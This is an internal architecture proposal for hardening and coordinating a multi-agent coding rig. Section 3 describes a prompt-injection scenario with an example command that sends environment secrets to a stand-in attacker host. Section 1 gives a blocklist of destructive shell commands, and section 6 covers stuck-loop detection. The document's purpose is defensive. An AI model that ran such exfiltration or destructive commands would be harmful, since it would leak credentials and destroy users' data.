Engineering Rig — Proposed Improvements (v2, Architect Revision)¶

This revision supersedes architecture-proposed.md (v1). It keeps v1's spirit — adopt what works, ignore what doesn't — but reaches different conclusions after a deeper read of the rig-conductor source, the Gastown architecture, and a wider audit of 14 multi-agent platforms documented in research-multi-agent-platforms.md.

The TL;DR: adopt 2 patterns from Gastown, reframe 2, drop 1, and add 6 things v1 missed entirely (4 from the wider research audit, 2 from a rig-conductorsource-level read).

Why a v2¶

v1 enumerated five Gastown features and proposed adopting them as a bundle. Two problems with that framing:

1. Gastown's bundle hangs together because of one philosophy. Their core principle (called GUPP — "if there's work on your hook, you must run it") demands that agents push direct to main with no human gate. From that, they need:

Prime, because every restart must reconstruct "what work am I on" from external state
Hard guards with no override, because nobody is reviewing
Identity attribution, because direct-to-main means commits must trace
Escalation routing, because the only safety valve when stuck is paging up

Pull GUPP out and the bundle decouples. Our rig uses PR-based human-in-loop (Review-E gates, auto-merge fires only after approvals, Copilot reviews each commit). The pressure that justifies the full bundle isn't there.

2. The source tells a different story than the docs. A code-level audit of dashecorp/rig-conductor revealed:

Claim	Reality
41 event types defined	28 are actually defined in `Events.cs`. Docs are aspirational.
`GET /api/reviews/next` is missing	It exists in `Program.cs:804–808` with optimistic claim semantics. README is stale.
Escalation is wired	`Escalated` event projects an issue to `state="failed"`, but no Discord routing, no stale-detection cron, no auto re-escalation. The data model is half-built.
Assignment is smart	Pure priority + FIFO sort. No capacity check and no per-agent cursor — an agent can be assigned multiple issues if it doesn't behave; we can't reliably ask "what events has Dev-E acknowledged."

3. The wider audit surfaced patterns that recur across independent codebases. When OpenHands, Goose, and Sweep all converge on cheap deterministic stuck-detection without anyone copying anyone, that's the strongest "build this" signal in the bunch. See research-multi-agent-platforms.md for the full convergence catalogue.

The Picks (in dependency order)¶

graph TB
    subgraph "Phase 1 — Safety, Traceability, Hardening (small, parallel)"
        p1[1. Dangerous-command guard]
        p2[2. Agent identity in git]
        p3[3. Default-deny egress NetworkPolicy]
        p4[4. Git worktrees per agent task]
    end

    subgraph "Phase 2 — Reliability (small-medium, parallel after Phase 1)"
        p5[5. Hook reliability spool]
        p6[6. StuckGuard middleware]
        p7[7. Human Prime SessionStart]
    end

    subgraph "Phase 3 — Smarter Coordination (medium)"
        p8[8. Per-consumer cursor + agent subscription registry]
    end

    subgraph "Phase 4 — Loop Bounding & Escalation (medium)"
        p9[9. Bounded-loop sentinel for Review/Dev ping-pong]
        p10[10. Severity routing + StaleHeartbeatService]
    end

    p1 --> p5
    p2 --> p5
    p5 --> p6
    p5 --> p8
    p8 --> p9
    p6 --> p10
    p9 --> p10

Phases are dependency tiers, not weeks. Phase 1 is fully parallel. Phase 4 depends on reliable hooks (#5) and stuck detection (#6) so escalations are trustworthy.

1. Dangerous-command guard (adopt directly)¶

Problem¶

Agents can execute destructive shell commands. There is no guard. A confused or compromised session can git push --force, rm -rf /, drop tables, or run sudo apt remove.

Decision¶

Port Gastown's tap_guard_dangerous (internal/cmd/tap_guard_dangerous.go, ~50 lines) as a Bash equivalent. No override flag — Gastown intentionally has none. The right escape hatch is "the human runs the command outside the agent loop." This avoids the failure mode where an agent learns to bypass its own guard.

sequenceDiagram
    participant CC as Claude Code
    participant G as guard.sh
    participant CE as rig-conductor

    CC->>G: PreToolUse JSON on stdin
    G->>G: Match command vs blocklist
    alt safe
        G-->>CC: exit 0
        CC->>CC: Execute
    else dangerous
        G->>CE: POST /api/events GUARD_BLOCKED (best-effort)
        G-->>CC: exit 2 + reason
        CC->>CC: Refuses, asks human
    end

Blocklist (mirrors Gastown's heuristics)¶

Pattern	Notes
`sudo` (any)	Privilege escalation outside agent context
`rm -rf /` or `rm -rf /*`	Filesystem destruction. Local paths like `rm -rf ./build/` allowed.
`git push --force`	Allow `--force-with-lease` and `--force-if-includes`
`git reset --hard`, `git clean -f`	Loses work
`drop table`, `drop database`, `truncate table`	Data loss
`kubectl delete namespace`	Cluster-scope destruction
`apt\|apt-get\|dnf\|yum\|pacman\|brew install`	Should go through devcontainer image

Drop from v1's plan¶

pr-workflow-guard (Gastown blocks gh pr create and git checkout -b because their agents push direct to main). We want PRs. Adopting this guard would break our model.

Touch¶

dashecorp/rig-tools (new hooks/dangerous-command-guard.sh + register in install.sh); dashecorp/rig-agent-runtime (add to base image hooks); HelmRelease values to wire into agent settings.

2. Agent identity in git (adopt directly, but trivially)¶

Problem¶

Commits from agents use generic author info. Cost dashboard already breaks down by agentId (per TokenUsageProjection), but git history doesn't.

Decision¶

Set GIT_AUTHOR_NAME and GIT_AUTHOR_EMAIL from the agent's agentId env var. For humans, the existing CONDUCTOR_AGENT_ID=human-$(whoami) already works — we just need to wire it through to git config in the devcontainer post-create.

This is a 5-line change. Do not call it a "system." It's an env var.

Touch¶

dashecorp/rig-gitops (HelmRelease values for dev-e and review-e); dashecorp/rig-agent-runtime (devcontainer post-create script).

3. Default-deny egress NetworkPolicy `[research]`¶

Problem¶

Today our agent pods have no egress restrictions. A prompt-injection vector that gets Dev-E to curl https://attacker.example/exfil -d "$(env)" would succeed. Cursor shipped default-deny egress for shell commands in their 2026 rewrite as the standard hardening for exactly this reason.

Decision¶

Add a per-agent K8s NetworkPolicy allowing egress only to:

GitHub API + raw.githubusercontent.com (work source)
api.anthropic.com (LLM)
rig-conductor ClusterIP (event sink)
Container registry (europe-north1-docker.pkg.dev)
DNS (kube-system)

Block everything else by default. If an agent legitimately needs another endpoint, that's an explicit additive policy change reviewed in PR.

This is 30 lines of YAML per agent namespace. No code changes. Closes the prompt-injection-exfiltrates-secrets vector entirely.

Touch¶

dashecorp/rig-gitops (new apps/<agent>/network-policy.yaml per agent).

4. Git worktrees per agent task `[research]`¶

Problem¶

When KEDA scales Dev-E to >1 replica on the same repo (or even different issues in the same repo), each replica clones the full repo. That's slow on cold start, eats PVC space, and creates the failure mode where two replicas race on filesystem operations.

Cursor's Cloud Agents handles this with git worktrees: one bare clone per repo + N worktrees, one per active task. Atomic file ops, no race, fast cold start. They report 35% of their own merged PRs are now agent-authored — they've stress-tested this model.

Decision¶

In rig-agent-runtime startup:

# One bare clone per repo, cached
git clone --bare $REPO_URL /workspace/.bare/$REPO_NAME

# Per-task worktree, ephemeral
git -C /workspace/.bare/$REPO_NAME worktree add /workspace/work/$TASK_ID $BRANCH

Cleanup on pod termination removes the worktree but keeps the bare clone for the next replica.

Touch¶

dashecorp/rig-agent-runtime (startup script changes).

5. Hook reliability spool (gap v1 missed)¶

Problem¶

/tmp/dashecorp-rig-tools/hooks/conductor-e-hook.sh:63 fires events as curl ... & — fire-and-forget, no retry, no log. If rig-conductoris down (Flux reconciling, pod restarting, network blip), events vanish silently. Heartbeats vanish. Branch and PR creation events vanish. The cost dashboard goes blind. Stale-detection (Phase 4) becomes untrustworthy — an "absent heartbeat" might mean "agent is stuck" or " rig-conductorwas down for 90 seconds."

Decision¶

Local spool with at-least-once delivery.

sequenceDiagram
    participant H as hook.sh
    participant SP as Spool dir
    participant CE as rig-conductor

    H->>SP: Append event JSON to spool file (ts + uuid)
    H->>CE: POST /api/events (5s timeout)
    alt ok
        H->>SP: Delete spool entry
    else fail or timeout
        Note over H: Event stays in spool
    end

    Note over H,CE: --- next hook invocation ---
    H->>SP: Drain (oldest first, max N per call)
    SP->>CE: POST each
    CE-->>H: 2xx to delete, otherwise keep

Detail¶

Spool dir: ~/.cache/rig-conductor-spool/ (host) or /var/cache/rig-conductor-spool/ (in-pod)
Drain budget: max 20 events per hook invocation, max 1s wall time, oldest-first
Idempotency: include eventId (UUID) on every event so server-side dedup is possible (separate, optional)
Backoff: if rig-conductorreturns 5xx three times in a row, skip drain for 30s (avoid hammering)
Bound: cap spool at 1000 entries; drop oldest with a WARN to stderr

Touch¶

dashecorp/rig-tools (modify hooks/conductor-e-hook.sh); dashecorp/rig-agent-runtime (mount spool dir in devcontainer).

6. StuckGuard middleware `[research]`¶

Problem¶

Agents can loop indefinitely. Today the only signal is: human notices, manually intervenes. The AgentStuck event type exists in Events.cs but nothing emits it autonomously.

The convergence signal¶

Three independent codebases — OpenHands StuckDetector, Goose RepetitionInspector, Sweep AI's visited_set + attempt counter — all converged on the same insight: don't ask the LLM whether it's stuck — count repeated tool calls and break above a threshold. None of them rely on the LLM noticing. This is the strongest "build this" signal in the wider research.

Decision¶

Implement a StuckGuard middleware in Dev-E (and Review-E) that runs in the agent loop, watching the last N tool calls. Detect 5 patterns from OpenHands' production-tested set:

Pattern	Threshold	Meaning
Identical (tool, args) repeated	4×	Agent is spinning on the same call
Same tool returning same error	3×	Agent doesn't understand the failure
Multiple agent messages with no tool calls between them	3×	Agent is monologuing
ABAB alternation (tool A → tool B → tool A → tool B)	6 steps	Oscillating without progress
Context-window compaction marker repeated	2×	Falling out of context

On any pattern: emit AgentStuck { agentId, repo, issueNumber, pattern, recentCalls } to rig-conductor, then exit the agent loop. Phase 4's escalation router picks it up.

Why deterministic, not LLM-judged¶

LLM-judged stuck-detection has two failures: (1) it costs another model call per step, (2) the same agent that's stuck is the one being asked "are you stuck." Pattern-counting is cheap, deterministic, and works.

Touch¶

dashecorp/rig-agent-runtime (new src/middleware/stuck-guard.js); character.json toggles.

7. Human Prime (reframe of v1's "Session Recovery")¶

Why reframe¶

v1 framed this as "agents lose state on restart." They don't — Dev-E is a stateless K8s pod whose cron polls GET /api/assignments/next every 5 minutes. rig-conductoralready remembers what each agent is on. Restart-resume for agents is essentially solved.

The real gap is for humans using Claude Code locally. When a human starts a new session, they have no equivalent of Gastown's prime. They have to remember what they were last working on.

Decision¶

Ship a SessionStart hook that does one HTTP call:

curl -s "$CONDUCTOR_URL/api/agents/$CONDUCTOR_AGENT_ID" \
  | jq '{currentIssue, currentRepo, lastEvent}' \
  | format-as-context

Plus a peek at the current git branch to derive the open PR (via gh pr view). Output as a brief context block at session start.

No tmux, no Beads, no roles, no markdown templates per role. That's all Gastown infrastructure justified by Gastown scale. We don't have it and don't need it.

Touch¶

dashecorp/rig-tools (new hooks/conductor-e-prime.sh, register SessionStart in install.sh).

8. Per-consumer cursor + agent subscription registry `[research]`¶

Why this replaces v1's "per-pod capacity events"¶

v1 proposed CapacityAvailable / CapacityFull events to make assignment capacity-aware. After reading LangGraph's versions_seen and MetaGPT's _watch + msg_buffer, the same problem has a cleaner shape: per-consumer cursor on the event log. Capacity is one of several things this enables, not its own primitive.

Problem¶

Today:

MartenEventStore.ClaimNextAssignmentAsync (lines 43–56) sorts by priority + last-updated. No capacity check.
Agents have no cursor — there's no way to ask "what events has Dev-E already consumed?"
KEDA scales pods based on Valkey stream length, but rig-conductorhas no notion of per-pod busy state.
Two pods of the same agent class can both poll assignments/next and both get work.

All four are symptoms of the same missing abstraction.

Decision¶

Add an agent_cursors projection (Marten):

record AgentCursor(
    string AgentId,
    long LastEventOrdinal,
    DateTimeOffset LastUpdated,
    HashSet<string> SubscribedEventTypes,
    int ConcurrentSlots,        // typically 1
    int InFlightAssignments     // current count
);

Add an agent_subscriptions registry — a YAML file in rig-gitops that says, per agent class:

dev-e:
  consumes: [IssueAssigned, ChangesRequested, ReviewLoopExceeded]
  produces: [WorkStarted, BranchCreated, PrCreated, AgentStuck]
  concurrent_slots: 1

review-e:
  consumes: [PrCreated, ChangesPushed]
  produces: [PrReviewApproved, ChangesRequested, ReviewLoopExceeded]
  concurrent_slots: 2

Three benefits:

Capacity-aware assignment. ClaimNextAssignmentAsync checks ConcurrentSlots - InFlightAssignments > 0 before returning.
Topology validation at deploy time. A startup check that every produces type has at least one consumesr catches dead-end events. (The AutoGen 0.4 pattern.)
Per-agent replay. "Show me everything Dev-E has acknowledged in the last hour" becomes a query against LastEventOrdinal, not a log scrape.

Touch¶

dashecorp/rig-conductor (new AgentCursorProjection, AgentSubscriptionRegistry, modify ClaimNextAssignmentAsync); dashecorp/rig-gitops (new apps/<agent>/subscription.yaml).

9. Bounded-loop sentinel for Review/Dev ping-pong `[research]`¶

Problem¶

ChatDev caps inner-phase chats at chat_turn_limit rounds. We don't. Review-E and Dev-E can theoretically ping-pong on a PR forever — Review requests changes, Dev pushes commits, Review requests more changes, repeat. There's no upper bound, no escalation.

Decision¶

Track the round-trip count per PR as a projection:

record ReviewLoopState(
    string Repo,
    int PrNumber,
    int RoundTripCount,
    DateTimeOffset Started
);

Increment on each (ChangesRequested → ChangesPushed) cycle. After 3 round-trips, emit ReviewLoopExceeded { repo, prNumber, count } and route to Phase 4's escalation as P1 severity.

Threshold is configurable per repo via subscription registry but defaults to 3.

Touch¶

dashecorp/rig-conductor (new ReviewLoopStateProjection + new event type ReviewLoopExceeded).

10. Escalation completion: severity routing + stale-detection (extended)¶

What's already there¶

Escalated event type defined (Events.cs)
Escalated event projects to state="failed" (MartenProjections.cs:100–103)
DiscordEventListener exists as a BackgroundService and posts all issue events to per-issue threads

What's missing¶

No severity dimension on Escalated. It's a flag, not a level.
No routing logic — escalations land in the same per-issue thread as everything else, with no @mention, no priority signal.
No stale-detection. The AgentStuck event type exists but nothing emits it autonomously (now solved by #6 StuckGuard for tool-loop stuck; this fills the heartbeat-stale case).

Decision¶

Add severity to escalation, add a StaleHeartbeatService background worker, route by severity. StuckGuard (#6) and ReviewLoopExceeded (#9) feed in alongside heartbeat-based detection.

graph TB
    A[Agent or human hook] -->|Escalated severity:P1<br/>reason text| CE[rig-conductor]
    SG[StuckGuard #6] -->|emits AgentStuck<br/>on tool-loop pattern| CE
    SD[StaleHeartbeatService<br/>BackgroundService, 60s tick] -->|emits AgentStuck<br/>after 5min no heartbeat| CE
    RL[ReviewLoopExceeded #9] --> CE
    CE --> R{Router by severity}
    R -->|P2| THR[Per-issue Discord thread]
    R -->|P1| ADM[#admin channel]
    R -->|P0| DM[Discord DM + @mention]
    SU[Stale escalation projection<br/>30s tick] -->|unacked > 4h| BUMP[Bump severity P2 to P1, P1 to P0]
    BUMP --> R

Why a projection-based escalator, not an LLM Mayor¶

Gastown uses an LLM "Deacon" agent to run gt escalate stale on a loop. We don't need an LLM for "if now - lastHeartbeat > 5min then emit AgentStuck." A C# BackgroundService is 30 lines. It also has the right reliability properties: it runs in-process with the event store, so it sees writes immediately and can't be racing a separate process.

Touch¶

dashecorp/rig-conductor (Events.cs add severity to Escalated, add EscalationAcknowledged/EscalationClosed; new StaleHeartbeatService.cs; new EscalationRouter consumed by DiscordEventListener); dashecorp/rig-tools (conductor-e-hook ESCALATE --severity P1 "reason").

What v1 had that v2 drops¶

Centralized hooks merge framework¶

v1 proposed hooks-base.json + hooks-overrides/{role}.json + a merge script. Gastown has this because it serves 8 agent runtimes × 6 roles × N rigs and needs per-matcher composition rules.

We have ~3 agent classes and a handful of humans. The same outcome is achievable with HelmRelease values templating settings.json for agents (already partially done) and a single settings.json shipped by rig-tools/install.sh for humans. Two paths. No framework.

If we get to 8+ agent variants, revisit. Until then, this is premature abstraction.

`pr-workflow-guard`¶

Already covered above. Blocking gh pr create is opposite to our model.

Deferred (worth building, not in this milestone)¶

These came out of the wider research with real merit, but compete on attention with the picks above. Listed so they're not forgotten. Each is a follow-up proposal candidate, not a "next sprint" item.

#	Pick	Source	Why deferred
D1	PageRank-ranked repo map as `RepoMapBuilt` event	Aider	Improves Dev-E cold-start grounding. ~3 days (tree-sitter + PageRank service). Defer until #8 cursor work is done — repo map should be cursor-driven.
D2	Pre-assignment task refinement (clarifier)	Camel + GPT Pilot	Posts clarifying questions on ambiguous issues, labels `needs-clarification`. Saves Dev-E tokens. Adds an LLM call per intake (cost). Defer until we have data on intake fuzziness.
D3	N parallel attempts + arbitration on KEDA scale-out	SWE-agent + Cognition	Today KEDA scales Dev-E to >1 only on stream length; multiple replicas on the same issue is rare. Build when that becomes common.
D4	Formatter-reversion check	Sweep AI	Pre-commit hook that rejects Dev-E's edit if `prettier`/`black` reverses it. ~2 lines. Trivial — fold into devcontainer post-commit when convenient.
D5	GitHub Spec Kit `.specify/` layout for multi-PR work	github/spec-kit	Markdown specs in repo, sub-issues from `tasks/`. Organizational change. Discuss separately before adopting.
D6	Recipes as YAML config artifacts	Goose	Lift Dev-E / Review-E system-prompt patterns into versioned YAML. Worth it once we have 4+ recipes; today 2 prompts in HelmRelease values is fine.
D7	`ContextCompressed` event for long-task resume	Cognition	Lets a fresh Dev-E replica resume a long task. Build when we observe long-task context overruns in production.
D8	`QuestionAsked` / `QuestionAnswered` paired events for sub-agent clarification	CrewAI	Extends #8 (subscription registry). Build when there's a real use case for one agent asking another a clarifying question.

What this does NOT change¶

rig-conductor stays the central event store and assignment engine
Marten + PostgreSQL stays — no Dolt/Beads
GitHub Issues stays the source of truth — no bd
FluxCD stays the GitOps layer
KEDA scale-to-zero stays — improvement #8 makes it more accurate via cursor + capacity
Discord stays the human-facing channel — improvement #10 routes within Discord, doesn't replace it
AGENTS.md stays the cross-tool rules document
Devcontainer + rig-agent-runtime image stays the unified environment
MkDocs at docs.rig.dashecorp.com stays the published docs surface

These are layered improvements on top of an already-functioning rig. No rewrites.

Anthropic's overarching warning¶

The Anthropic Claude Agent SDK doc "Building Effective Agents" warns:

"Most multi-agent setups are slower and worse than a single agent with good tools — invest in agent-computer interface first."

Our 3-agent shape (rig-conductor, Dev-E, Review-E) has clean handoff boundaries and survives that warning. The trap to watch is growing the role count. When proposing a new agent, the bar is: "does this role have a clean event-shaped boundary with the existing agents?" If the answer requires shared intra-task context, build a tool instead. GPT Pilot's 6-role pipeline is now archived as unmaintained; it's evidence of where this fails.

Reading order for whoever picks this up¶

architecture-current.md — what the rig looks like today
architecture-proposed.md — v1, kept for history
This document (v2) — the decided direction
research-multi-agent-platforms.md — backing research with [research]-tagged picks justified
documentation-standard.md — frontmatter, doc-check CI
onboarding.md — devcontainer setup for humans

When this work is broken into issues, each section above ("Touch") names the repos involved.

Engineering Rig — Proposed Improvements (v2, Architect Revision)¶

Why a v2¶

The Picks (in dependency order)¶

1. Dangerous-command guard (adopt directly)¶

Problem¶

Decision¶

Blocklist (mirrors Gastown's heuristics)¶

Drop from v1's plan¶

Touch¶

2. Agent identity in git (adopt directly, but trivially)¶

Problem¶

Decision¶

Touch¶

3. Default-deny egress NetworkPolicy [research]¶

Problem¶

Decision¶

Touch¶

4. Git worktrees per agent task [research]¶

Problem¶

Decision¶

Touch¶

5. Hook reliability spool (gap v1 missed)¶

Problem¶

Decision¶

Detail¶

Touch¶

6. StuckGuard middleware [research]¶

Problem¶

The convergence signal¶

Decision¶

Why deterministic, not LLM-judged¶

Touch¶

7. Human Prime (reframe of v1's "Session Recovery")¶

Why reframe¶

Decision¶

Touch¶

8. Per-consumer cursor + agent subscription registry [research]¶

Why this replaces v1's "per-pod capacity events"¶

Problem¶

Decision¶

Touch¶

9. Bounded-loop sentinel for Review/Dev ping-pong [research]¶

Problem¶

Decision¶

Touch¶

10. Escalation completion: severity routing + stale-detection (extended)¶

What's already there¶

What's missing¶

Decision¶

Why a projection-based escalator, not an LLM Mayor¶

Touch¶

What v1 had that v2 drops¶

Centralized hooks merge framework¶

pr-workflow-guard¶

Deferred (worth building, not in this milestone)¶

What this does NOT change¶

Anthropic's overarching warning¶

Reading order for whoever picks this up¶

3. Default-deny egress NetworkPolicy `[research]`¶

4. Git worktrees per agent task `[research]`¶

6. StuckGuard middleware `[research]`¶

8. Per-consumer cursor + agent subscription registry `[research]`¶

9. Bounded-loop sentinel for Review/Dev ping-pong `[research]`¶

`pr-workflow-guard`¶